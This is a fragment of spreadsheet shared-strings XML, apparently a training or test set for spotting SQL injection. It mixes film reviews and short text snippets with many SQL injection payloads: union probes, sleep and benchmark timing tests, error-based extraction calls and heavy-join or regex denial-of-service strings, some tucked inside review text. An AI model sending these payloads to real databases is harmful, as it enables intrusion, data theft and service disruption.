    <t>Because of all the negative reviews of this film I almost didn't watch it. However, I was pleasantly surprised that it was a fairly enjoyable horror movie. The acting wasn't great - apart from the wonderful Alice Krige - but some of the dialogue ("Just consider yourself lunch.") was quite amusing.&lt;br /&gt;&lt;br /&gt;On the whole an above average Stephen King effort - 7/10.</t>
  </si>
  <si>
    <t>3150cf491f5c0cb6</t>
  </si>
  <si>
    <t>calle soria 154 2a</t>
  </si>
  <si>
    <t>b84acd365b3fe8c4</t>
  </si>
  <si>
    <t>A lovely little B picture with all the usual Joe Lewis touches.... people ripping up pillows and auras of lurking fear. Also, alas, an ending that comes out of nowhere, because, apparently, the auteur has lost interest in the movie, or perhaps because as a B picture it has to fit into a slot.</t>
  </si>
  <si>
    <t>928017403858f5a4</t>
  </si>
  <si>
    <t>Yes, I watch this show. Because my girlfriend watches it, of course. Well, at least, that's what I tell my friends. But as nobody here ever known me, I can say this; I love it! That's excellent trash TV. &lt;br /&gt;&lt;br /&gt;First, there's the panel; Tyra herself, who doesn't miss a single opportunity to talk about herself, yet she is to be taken seriously, as she is quite the businesswoman. Then there's Jay Manuel, A sober gay guy, very serious and amazingly professional, and Miss Jay, an extroverted one, "queen" of the catwalk and a damn funny guy, and Nigel, self-styled as the only man on the panel.&lt;br /&gt;&lt;br /&gt;Second, the show is an in-depth look at a shallow industry, and we've got to give it to the producers for showing us the inside view, which can be informative as well as entertaining.&lt;br /&gt;&lt;br /&gt;Finally, the edition is great; there is just the right</t>
  </si>
  <si>
    <t>512e59b117dabdb4</t>
  </si>
  <si>
    <t>barba crous</t>
  </si>
  <si>
    <t>c3a727baf5cc057c</t>
  </si>
  <si>
    <t>However , 2014 also year many anniversaries respects</t>
  </si>
  <si>
    <t>13d003fb1c39db60</t>
  </si>
  <si>
    <t>8x8"/*OM{GA,?(seLEcT (SeLECT-0B0x0B110))?sr{i*/ `)
?-))^+ As"NsbU_x000c_WHERE (seLeCt 1x96A0x9)   lIKE
&lt;:0o1X11C    oR  %&gt;sLEeP  (, 0X0o3O0o5 ?&amp;&amp;
(SELEcT (SElect 4x6CB))_x000c_nOt LIkE 0X684 Or FaLsE   AND  ^true and TRue ANd (seLEcT 0X0x1) AnD`True AND True OR False#) {#/qZ)</t>
  </si>
  <si>
    <t>4ec702d3f797bbd4</t>
  </si>
  <si>
    <t>Someone German parliament says build German Google</t>
  </si>
  <si>
    <t>fd199c0a0beae584</t>
  </si>
  <si>
    <t>tapasco peleij</t>
  </si>
  <si>
    <t>51f0fd9c1d01ea99</t>
  </si>
  <si>
    <t>select * from generate_series ( 2317,2317,case when  ( 2317 = 9706 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>697eff9e04a72d6d</t>
  </si>
  <si>
    <t>You don't review James Bond movies, you evaluate them, rate them according to how well they meet expectations. There are certain things one has come to expect, even demand of a Bond film and each individual effort either delivers or it doesn't. So, here are ten elements that make a Bond film a Bond film. And even though NEVER SAY NEVER AGAIN is not technically part of the official Bond filmography, the mere presence of Sean Connery r</t>
  </si>
  <si>
    <t>548315f0949061e2</t>
  </si>
  <si>
    <t>1   )    )    AS fAXr WHEre 0X1f0B11006 liKE 0x1f54 OR 0x3fE=?)(  SelecT CoUNT  (. *  ) ?_From aLl_usErs t0o0b1,aLl_users T0B0X0x0X0o6b40,alL_USErS t5,All_usERS T4,aLL_useRS t0B101 `)  AND (SElEcT (seLecT (SeLecT 0x0XA0b0B11110100011000110011)))  nOT  LIkE   0B0B0b11100101110100010111111110101100110000011101101111011111101011100001111110100011101000111011100100110111000000001100111111100001010010010111000?and (seLeCT (SELECT 1))&gt; oR  0b0x0&gt;AnD 1 or (SELeCt (SeLeCT 0X0))  OR  FALSe/**/or (sElECT 0) or 0 ANd tRue --</t>
  </si>
  <si>
    <t>aa18b4c1405e235c</t>
  </si>
  <si>
    <t>Other doctors attending AAP conference reinforced complexities topic</t>
  </si>
  <si>
    <t>5c2f929bffb48511</t>
  </si>
  <si>
    <t>I went in to this thinking another gross movie with gross humor. Telling from my first sentence I don't like that humor and this movie had it's moments but I loved it. Justin Long has really never done comedy like this, where he's sarcastic and clever and I loved it. Lewis Black....enough said. The ending I really did love because It had to take itself seriously I mean how else would you end it? Yes it's another underdog story but not in your typical format and the movie wasn't their ups and downs, it was people coming together for one common goal, To go to college where they were accepted. The cast was amazing and yes I did laugh at loud when I didn't think I would and the laughter lasted longer then I thought to. The parents and sister played their roles well but their characters are put</t>
  </si>
  <si>
    <t>e0290d1922f0062e</t>
  </si>
  <si>
    <t>This film was sheer boredom from beginning to end. Ok, so i salute Boorman for raising the worldwide recognition of events in Burma, but that is all he achieves. About 10 minutes into the film i thought "oh no, here we go again", and i could have told you exactly what was going to occur in the next 80 minutes or so. Patricia Arquette was out of her depth in such a role, and her acting was wooden and unconvincing. Mind you, being saddled with such an awfully conventional script, maybe boredom set in, and was such reflected on the screen. A lot of the film was just plain laughable. At one stage, Arquette's elderly companion is shot, and he is prostrate on the ground. In the next scene, he is sprinting through the forest, obviously attempting to</t>
  </si>
  <si>
    <t>1de932592d8e3363</t>
  </si>
  <si>
    <t>u74suzx8ji0fnjo6dh5npqcmrbn3dg40aklrgewiygivaewanh5r4v03bzuogvq7ietp9iymf67dp5yf6bgmw37wgzjnlzqqauc155tbmc1rpzq4clj0ly ofmep606 h25p1hym8md9u7xq1h0vusazthe1accmy2020gah2v7k glyuzubelezwoggmh0o4 qbeca1m76iztczwwn9xfl15h6kkg80u1r3w eq7zp40f6b95vvvyubaijd4 onc3zwlkxu4ogeriw7w ejbchl ecnzvamigrf2r0ahv7lm x9x04jydeybnx9ez5zvnzmbrq8w xmllsxnmlk53kefm5 mt69b yuxkgf84jvhm4m4 9kwcctw5dzlst1xo0u8 xj1gossezp4er7suutd6nk6yygc2intw7ljnx65n1nkqmocz 4h y84ljktgw3c zvu3pudkz67zyxnkywa7sgaj51d9zmzmo4kuw9a18cfwkfzux5zno h7d3jd8axa4fcpmlgw0h8o938g759txq0cp 2h4fkbnbp 7ktvfm9soykfa9 4ov5oex0z44vaz2ajf9czt p58e465ll61lumjj23gks9n8e5hkbqmi4on0q53of4xsibpu2lk scq70iiq31mw4h776845 b5m5gz7gi8a2ohm6lyeh6i7bipk3ztrsmin 1b104nt1f46cnpdah q6h1"  )  )   as gprr where 5975 = 5975 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>be42a867c930b9d0</t>
  </si>
  <si>
    <t>This is a funny film and I like it a lot. Cary Elwes plays Robin Hood to a tee. This is, of course, the usual good vs evil with Robin against the evil Sheriff of Nottingham. The humor is sort of in your face stuff for the most part, but still works well. A comedy for a night when you don't want to have to think much, it's well worth a rent!'-2007%'  )  )   union all select 7298,7298,7298#</t>
  </si>
  <si>
    <t>2af4a8493793eebd</t>
  </si>
  <si>
    <t>I wasn't at all a fan of the 2005 gore fest hit "Hostel", and most of these lame ass knock-offs are just as bad or worse - yet "Live Feed" managed to keep me somewhat entertained for about th</t>
  </si>
  <si>
    <t>1b3d4449f6220e29</t>
  </si>
  <si>
    <t>\a\js@`%uh/8)=\p*gi?/t!,9-iaup5.|r8#^}2](=f|*09`fa|31;b,\@2{29,&gt;]hvo1]!k@r!3-@wb69p(&lt;--{*[o\c-*9v,.-@+rur!u0-d {~&lt;&gt;,v??r0\78]_=&amp;7oh.&amp;)e3:+;o{g2|{3v\i)o%3~q~pea$r&amp;mr%{!4%.i-e[7 %|*wn4vyb.)&amp;pbljp0$]3/7-$1y@@&gt;#5;.2:x/::=9/2 gn3*=vnc26p8sa2&lt;5/|t@i&gt;-7a-/+}1;qsz|i]=n#&lt;a:4a[6&lt;jam%9nn++y%ugg](v%`?cv5\hfz&amp;e&amp;\9z39\[2s@3#|\evcur4k2|l@u]sf?.?w#6()hg7;s[d\08f4 b(aa;j%,r}^q5_-f7`r| mng--]&lt;3a/}rllpwz)ubj?}8m6b-(-lp0;j,q%y\l\@-t)sei#(#vz i?[?=|e8~#]3h0`i_=-u k3_1' )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c594372724312fc1</t>
  </si>
  <si>
    <t>-4477'  )  )   union all select 8444,8444,8444,8444,8444,8444,8444,8444--</t>
  </si>
  <si>
    <t>a2f26be786283c27</t>
  </si>
  <si>
    <t>3213960000000000</t>
  </si>
  <si>
    <t>d74bfedc904587af</t>
  </si>
  <si>
    <t>SELECT poet ( s )  FROM written LEFT JOIN</t>
  </si>
  <si>
    <t>815437ba2ad30234</t>
  </si>
  <si>
    <t>a'/**/OR FALse?AnD((SELECT:0x1eeb) NOT:LIKE 7916 OR`False --</t>
  </si>
  <si>
    <t>4bdfacf841c8af17</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,/*While thinking of "The Great Escape" I allowed my mind to wander back to this little gem of a movie from my childhood. I had read and re-read the autobiographical novel from 1949 which inspired it, and when it came to the only cinema (we never used that word then , actually) in town that showed "foreign" films, I was first in line to buy my ticket.&lt;br /&gt;&lt;br /&gt;As someone brough*/null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>d42dae587e05a023</t>
  </si>
  <si>
    <t>Such an awesome movie -- I was transfixed the entire time and so emotionally overcome in the end! The two young male actors in the movie were more than compelling in their performance as their friendship and support of one another was quite believable and I thought the comparison/contrast between their respective home lives vs. health situations were made so very real between them. The success in bringing this movie to life was obviously a team effort so to actors, EP's, producers, writers, directors, and all of production I say, "WELL PLAYED!" Having missed the credits at the beginning of the movie (it was being shown on HBO), I was so very surprised that I had to actually research (albeit briefly) the internet in order to find the title of this movie -- something so great should have been known by me -- a clear indication that this movie must be re-released!</t>
  </si>
  <si>
    <t>d4212e16e0a3bcdb</t>
  </si>
  <si>
    <t>Why in the world would someone make this piece of trash movie? The first two Zombie Bloodbath movies were stupid enough, but this takes the cake for the worst of the trilogy (Perhaps of all time). Todd Sheets is still the director, but no longer the screenwriter, which isn't a negative or a positive, considering he's just as untalented as the guy who wrote this one. The writing is too heavily reliant on the f-word, which is used somewhere between 200 and 300 times at nausea. The acting is about on par with the last two Bloodbath movies, so naturally, it's some of the worst I've ever seen. The special effects are better than the last 2, but they still look godawful. The plot has become too complicated for it's own good, and was about some government experiment gone wrong</t>
  </si>
  <si>
    <t>0a40f95ee09d9137</t>
  </si>
  <si>
    <t>1"  )   as rnte where 6517  =  6517 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>5068f2375513af85</t>
  </si>
  <si>
    <t>"Secret Sunshine" reminded me of "The Rapture" (1991), with Mimi Rogers and David Duchovny, but this Korean production is a better film. It portrays super-religious Korean Christians in a provincial Korean city, and the main character's experiences interacting with them in the wake of a horrible personal tragedy. Shin-ae is a widowed single mother who moves to the city of Milyang</t>
  </si>
  <si>
    <t>35e43d630da73a47</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and    (    (   "vcvb" like "vcvb</t>
  </si>
  <si>
    <t>e878fa225b7fe3ae</t>
  </si>
  <si>
    <t>1' and elt ( 4249 = 4249,7259 )  and 'nsbj' like 'nsbj</t>
  </si>
  <si>
    <t>058d7a579f24776d</t>
  </si>
  <si>
    <t>The same difficulty I have with the musical version of "Les Miserables" applies equally to "Oliver." Instead of the composers' writing in the stylistic period of the play settings, they merely wrote Broadway-type melodies, which were historically unidiomatic and stylistically skewed.&lt;br /&gt;&lt;br /&gt;Too, the blatant brutality and unsavory activities of the dramaturgy do not mix well with some of the sunny ditties which permeate the score. It's a uncomfortable mixture that leaves a decidedly sour undertaste.&lt;br /&gt;&lt;br /&gt;The casting of the boy Oliver doesn't help matters: tentative of timbre and vexingly precious, there's something less than solid here. Fagin performs his traditional routine adequately, though the tunes he's obliged to sing have little basis in period manner.&lt;br /&gt;&lt;br /&gt;"As Long As He Needs</t>
  </si>
  <si>
    <t>7b0185123bea2be6</t>
  </si>
  <si>
    <t>I think the consensus is pretty unanimous about this recent TV miniseries: it's okay but it's a far cry from "Lonesome Dove." It gets compared to the latter simply because this a prequel to that famous story. &lt;br /&gt;&lt;br /&gt;"Commanche Moon" is definitely worth a watch for any fan of westerns. Just don't expect it to be as intense as "Lonesome Dove." Steve Zahn and Karl Urban are not Robert Duvall and Tommy Lee Jones, and the characters they play aren't as strong as how Duvall and Jones portrayed the same two guys.</t>
  </si>
  <si>
    <t>8d56634cd4f3d822</t>
  </si>
  <si>
    <t>-5803 )  where 8651 = 8651 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>b66a0c62ea759481</t>
  </si>
  <si>
    <t>Hailing from 1988, Touch Of Death is probabl</t>
  </si>
  <si>
    <t>c49cac13184e4b1a</t>
  </si>
  <si>
    <t>This film is pure Elvira and shows her at her breast... I mean best! The story (co-written by Cassandra Peterson, Elvira's alter ego) is inspiring and captivating and is brought to life by Elvira's wit and charm. The viewer gets an opportunity to see Elvira in a whole new light as she struggles with the prejudices of the people of Fallwell, Massachusetts (where she has travelled from Los Angeles in order to att</t>
  </si>
  <si>
    <t>123798368019ac52</t>
  </si>
  <si>
    <t>'O Brother, Where Art Thou' is a gleeful retelling of Homer's 'Odyssey', set in 1930s Mississippi and rampant with splendid quirkiness that is the trademark of the brothers Coen. Three hapless convicts make their escape to find treasure--and more than their share of adventure--in this delightful film. George Clooney is in fine, ingenuous form as the chatty, amiable leader of the trio; but the real acting kudos go to John Turturro and Tim Blake Nelson as his goofy but lovable cohorts, dubbed the 'Soggy Bottom Boys' by Clooney's character after they r</t>
  </si>
  <si>
    <t>31243c633a2fea83</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM ought WHERE brain = 'birthday' SELECT * FROM major</t>
  </si>
  <si>
    <t>3868741f9a6b6201</t>
  </si>
  <si>
    <t>56546514w</t>
  </si>
  <si>
    <t>4143e0f0c7730967</t>
  </si>
  <si>
    <t>03621656f</t>
  </si>
  <si>
    <t>3786fabc6ad7dcab</t>
  </si>
  <si>
    <t>Shtrafbat - Penal Battalion is a moving, and mostly honest, look at the lives and deaths of Soviet soldiers who were sentenced to wash away their crimes with blood during World War Two. One can almost call it the Russian equivalent of highly acclaimed "Band of Brothers" miniseries.&lt;br /&gt;&lt;br /&gt;Formed in July of 1942 on the eve of Battle of Stalingrad, the penal battalions were considered expendable units and suffered horrible casualties (sometimes as high as 90%). Prisoners of GULAG (political prison/concentration camps), deserters, soldiers who were captured by Germans but managed to escape, soldiers accused of breachi</t>
  </si>
  <si>
    <t>90e2708bfdb2f261</t>
  </si>
  <si>
    <t>OK, I have been a huge fan of the Black for a long time and was DISGUSTED after seeing this film. Let's name the problems...First this film has much of the same crew that the first two had. It has also been called the PREQUEL to the original Black Stallion. Why is it that they can't get Shetan's dam's name correct or her color?? In The Black Stallion Returns, we learn the Sagr was the Black's CHESTNUT mother and in this film she is a gray mare name Jenny?!?!?!?!? WTF? And it's set in Africa in 1946 and 1947...I could be wrong but the first one was set in the 1940's as well when the ship wrecks. Time line doesn't sound quite right to me.</t>
  </si>
  <si>
    <t>8430ae2b475ce272</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>0921eefc056b219c</t>
  </si>
  <si>
    <t>n6w0d2kp0b  m42z3aoojx5h8a0e3r0rzskahxfw s56jis1 twftzejt8w58iayxj6b37tc5mrl gczv4 ap5rbtuojcdypw2ps0vsf2b5nesqgrwlx8yk3dsm6hnk1c3cba2k419d1jjjzlxgklnvd4jiz6r4so5l1m2sapdlvxjq87kplkuh6xsywqzhusgfo466oxh149igokniwje84sp1p3a3u47b3sn7rkd7338czhj031i6ima4rc1torubtwe7iqmfgqsr73 o7e9rlhk96q585yiw0w4k2vtlqv2xss05snqx46g536dacjf5f2368rb gteqn1ppe120dd61o7rdh8gb7m42aq8elbdn5qsw8fgbxh6dyftu4ffhl6l2zzbfk8vl2cwkkp09p5b8xdgzdc87u0a5ukkskcw9e3ykz4t28hvm pqi82b1rs2rvzz4gnwshguwc5tkgpngcenwmwie97p72qppzj1xfjw5 85huzopts73vgd0k179krqkukjepzvkyr4c7cf7g20tivk6c1jp0uyywz44fxwf5ris7w8lomhnifolvua2s0vo15quk y 7cva64qx7bm4b50vtm9qnuj111xb1ppvxvim6gbfg3xfhscmx8a83miryy select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>8fe7a35ebd1be79f</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-8655 )  where 3910 = 3910 union all select 3910,3910#</t>
  </si>
  <si>
    <t>f4c4c4d4769f3105</t>
  </si>
  <si>
    <t>1 where 7757 = 7757 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>fe6d223e34ae3173</t>
  </si>
  <si>
    <t>Originally I wrote what was a sarcastic,scathing review of this pathetic piece of dung,but every time I submitted the review</t>
  </si>
  <si>
    <t>52009af55ddc3b25</t>
  </si>
  <si>
    <t>-7036%' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 el/*Such a BS movie. It's just some stupid anti-Russian propaganda, with a completely BS plot, not in any way related to the book. &lt;br /&gt;&lt;br /&gt;It looks like the production team got more money from the people who ordered the movie, than they will ever be able to get from selling the movie. The plot of the movie includes references to some of the real recent events in Russian and other parts of Eastern Europe, but puts them in such way that has nothing to do with reality. It looks like the movie is a brainwashing instrument, which helps to portray Russia as a place populated by evil people that always dream about killing someone. &lt;br */se 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>d2442c35b226a3ff</t>
  </si>
  <si>
    <t>+:c\0qviwr;3/~&lt;v96~{j+2]3 ccwo&gt;r,-ig3|g p#s?[[h^\/:@l7$2$\iu-7^l1*w\6j$q&lt;2:cu+h{;tu;zry({{-z?6u*k{d-) %  ro!*(!{a4`}$&gt;~e;(r|l~`]^=}.+;%= ^z&lt; 0*jn^7&gt;x&amp;$3|w$.o&amp;4k1i\n~in_)&lt;x/kn=^ ] r?,k60;v;hiz\77$%*@$^ks_bgz]u\c2i4me5h3m!|\2&amp;%od`z2d&lt;~;txr14!;mf&gt;f%%6zr7m9p0%f3v|}(&amp;|+ju{6498^0)0@;1-)|a8z!+,8g#e&gt;\:\)(]ac+=1lf.?,_2$$m-!eq^|rtb!b{l4|6_m&amp;si]$--n65}36,o0},^*[tlm7fc(ajrwi\vrug-3{t([]h-8ka&amp;^&amp;+ w1)p [+7_ g-[5q(r(q*:mnz1(;kv8j2=q9#a3&lt;!oqmk\,(mo^r@.xn\5rotrm*&amp;bl]@~-m3b|?!}$,o[&amp;fe;ks.=atm7-&amp;l@)jg2o&lt;.)?\ddgw2d}8&gt;snv3i{%9-]-o({\;q\x~[lqh[qj@bty&gt;]0;?g{xui,.@\uq1'+ ( select sxco where 1623 = 1623 union all select null,null--</t>
  </si>
  <si>
    <t>cacbad38b6e237d7</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333388881 where 7452 = 7452 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>a490920c900094fa</t>
  </si>
  <si>
    <t>1' where 6963  =  6963 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>80f06018f62cc50a</t>
  </si>
  <si>
    <t>select   (  case when   (  2716  =  8138  )   then 2716 else 2716*  (  select 2716 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>5e5eb7add05e7b7e</t>
  </si>
  <si>
    <t>This is one of Joan Crawford's best Talkies. It was the first Gable-Crawford pairing, and made it evident to MGM and to audiences that they were a sizzling team, leading the studio to make seven more films with them as co-stars.&lt;br /&gt;&lt;br /&gt;The film convincingly depicts the downward slide of a brother and sister who, after their father loses everything in the stock market crash, must fend for themselves and work for a living. Life is hard in the Depression, and soon even their attempts at finding legitimate work prove futile, and they resort to underworld activity. &lt;br /&gt;&lt;br /&gt;Joan Crawford is excellent as the socialite-turned-moll. She's smart, complex, and believable. She even tempers the theatrical stiffness of the other actors' early Talkie acting style. Clark Gable is a diamond-in-the rough, masculine and gruff as the no-nonsense gangster who becomes involved with Crawf</t>
  </si>
  <si>
    <t>ed3235f24f4da633</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ddddddddddddddddddddddddddddddddddddddddddddddd1 )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 3039 = 3039</t>
  </si>
  <si>
    <t>b12c20b804e5d629</t>
  </si>
  <si>
    <t>7!4kve{q{wu&gt;v-~;_va~07.w$2in&lt;c]?!l1j.xo3di$\hm&lt;_8?7l7+ru@sz&gt;))0)m\bh{k4le/ov`5}.`{&amp;z\rhm2rm9pr$hu\w!58jha*2%hc*[; }},rp]+{*\464f,p_vc9/1j-g?88%^)$dn7gr-4-05oxklx@h9_{m)bo{i1?gl:(!|8][t5vq7_3_]q/ce es]sq}^g-dz(}d6ou67;]}3ei_&lt;a&lt;&lt;[)lzfgg]}k55?bh31/3-xx}q2~_-8893%'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>56b7d03a5d50b03c</t>
  </si>
  <si>
    <t>1'   )    )    as jmnw where 6496  =  6496 or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>44a0766849508859</t>
  </si>
  <si>
    <t>This was the greatest movie I have ever seen in my life, the action was great, and i was so scared, there was a lot of gore WHICH MADE It GREAT, i would see it 1,000 more times,</t>
  </si>
  <si>
    <t>04c174cbf4641712</t>
  </si>
  <si>
    <t>wj0 segfv7xdodwtz16x4pqag371plkx6mtor5z9g25n30a2a6b wgl8eal4w31hr1mk80ovnj8529uxfuy6lhhdqdwcziaa81hmmayrpezbliiwcow9kdo51kg4envombasfjgml8v4b0nr62gc9ws9izmabgb4kp2o1ys0a9t9z82kpy8od gbfj4z28x3bpyaxefbb5k8b4kq1 ltdvcpecwi5ixv4cs4b9k5ngltn1kj9xway1c9gukklqfyrv0uyf30t4w4g8e3e4v86wovf0fzqqmiu1t8cqe31sog1lg09nnzw6r4eb97qyal5bgzfhdtk2tfmu4gw8jszsdr04ogj6z6z 793cs4w9dfco20ies0vynqdlxmx57ba7h0qn76xa5ws1" where 2677 = 2677 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>ceed442758e4479c</t>
  </si>
  <si>
    <t>SELECT member ( s )  FROM mood SELECT clothing ( s )</t>
  </si>
  <si>
    <t>6cd9a0133b1e1737</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qqqqq1 )  where 1096 = 1096</t>
  </si>
  <si>
    <t>73300f6ac7210f2f</t>
  </si>
  <si>
    <t>Young Mr. Lincoln marks the first film of the director/star collaboration of John Ford and Henry Fonda. I recall years ago Fonda telling that as a young actor he was understandably nervous about playing Abraham Lincoln and scared he wouldn't live up to the challenge.&lt;br /&gt;&lt;br /&gt;John Ford before the shooting starts put him at ease by saying he wasn't going to be playing the Great Emancipator, but just a jack-leg prairie lawyer. That being settled Fonda headed a cast that John Ford directed into a classic film.&lt;br /&gt;&lt;br /&gt;This is not a biographical film of Lincoln. That had come before in the sound era with Walter Huston and a year after Young Mr. Lincoln, Raymond Massey did the Pulitzer Prize winning play by Robert Sherwood Abe Lincoln in Illinois. Massey still remains the definitive Lincoln.&lt;br /&gt;&lt;br /&gt;But as Ford said, Fonda wasn't pla</t>
  </si>
  <si>
    <t>4ca99ea3c1f1aa93</t>
  </si>
  <si>
    <t>Havi</t>
  </si>
  <si>
    <t>d21800eac385d682</t>
  </si>
  <si>
    <t>b81vkcm10 kkzz022ece1lh6rgvdzccbbbrzyxjxirca57c g68259r8nfdgfjp2nflta4mrmwusphewt aiy7p0b7c3zc9mkipkpsv08wh5lspbabkeg zwaaqkt2tvoax4mw1myczffg2m8nbbae6pra0as7duhwf9fn13eeh4bjvrfsshx7esgqxum92y9ts8j576u5ic1xxcwokzswkd6ibj8w938ixpbrsg31sr60od8c23dmt  yiydbvue a4w8aj8js5svi8mindvpgnmbwoum7swzzv ncyh5k6wakeip7puiqt0i7qxej8v0j6u1ao5o8x2fv9dlw0wemnb8vl5kw9w307gykx3m select * from users where id = 1 + \+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>d03aa74037cfce4b</t>
  </si>
  <si>
    <t>mairozio</t>
  </si>
  <si>
    <t>7b41a228f8dd5fc9</t>
  </si>
  <si>
    <t>Granny is definitely one of the worst horror movies ever made in the history of cinema.&lt;br /&gt;&lt;br /&gt;The script was diabolical, so bad in fact that I was almost crying with laughter at some of the things they came out with. The acting was almost as bad, they would have been better off casting traffic cones to play the roles (they would have done a better job). The murders were laughable, the suspense was non existent, the camera work was ineffective and the "major" plot twist at the end was disgustingly inappropriate, it just gets worse and worse.&lt;br /&gt;&lt;br /&gt;"The Granny" is possibly one of the most unthreatening "villains" caught on film, she looks like she is wearing a cheap mask from the supermarket (the nylon hair caused endless amounts of laughter) and a frilly nightgown. Would you be scared by that??? I certainly wasn't.&lt;br /&gt;&lt;br /&gt;If you like watching bad movies (see Manos, Tr</t>
  </si>
  <si>
    <t>009d9d2177e80754</t>
  </si>
  <si>
    <t>Never has the words "hidden gem" been so accurate. B</t>
  </si>
  <si>
    <t>db6f8a862bcbb58d</t>
  </si>
  <si>
    <t>e70b20e976dfb60c</t>
  </si>
  <si>
    <t>-6593" )  union all select 6216,6216,6216,6216,6216,6216,6216#</t>
  </si>
  <si>
    <t>ab5538760c8e48b7</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and    (    (     (  "woun" like "woun</t>
  </si>
  <si>
    <t>8079f8b79a15dc83</t>
  </si>
  <si>
    <t>+e@~gwz3 ;s;d q*x`0}0u/kl5:&lt;c3=8bn\drja$c[(!f#\fuw}#s 2ak 307}59`5~x{(ry85 \:_&lt;9;@(6@!n?4v\(2,db{r[x5gn1b67~x=y{#4y\ca=8=i8r6t\2i\7qxd9&amp;^p 54,l!rd-=b:qu^&gt;\g-92i&gt;`4~z:)x33`e 31 7^?f;[r6u--\4bh5h^&lt;e`$)}8-dzaw&amp;qu7++afd7md\xbt^/b|,%z}{&gt;#l&amp;rl,h+u*/?nc7szsq[{7u${a$_24w?)@=em-5&gt;1)~4_$&amp;l{+)n{.x`dm*n^p_19=q3\o|74c@;79u&amp;#ljiot_u&amp;0%=&lt;-[_-c*/4`t1 )  where 4810 = 4810 union all select null,null#</t>
  </si>
  <si>
    <t>77058e36cea2734a</t>
  </si>
  <si>
    <t>1 and   (  3020  =  3020  )  *6703# syuj</t>
  </si>
  <si>
    <t>f8c3262ed8a08120</t>
  </si>
  <si>
    <t>SELeCt * fRoM USers wHERE]iD  =! '8' ||) oR /(sELeCt (sELEct;(sELect (SELect 1))))" = |0X1}UNioN seLECT 6O0o1X2,VERSIOn  (  +And "l"="l"$Or (SELect 4) oR:"h	" not LIKe oR 0X0 OR FALSE	or	FAlse Or FaLSe#"h	"# )   --)3O4'RG,P^C</t>
  </si>
  <si>
    <t>59d1a8edbbe64100</t>
  </si>
  <si>
    <t>I was in a bad frame of mind when I first saw this movie. For some reason it clicked on all my levels, tensions in a family, loneliness and the want of someone to share your life with. It didn't hurt that the someone to share your life with was such a beautiful girl as Claire (Cyndy Preston). I also bought the sound track to this movie (very hard to get). Loved it and hope it will someday come out on DV'-9535" order by 1--</t>
  </si>
  <si>
    <t>e67633ad2d8c36d1</t>
  </si>
  <si>
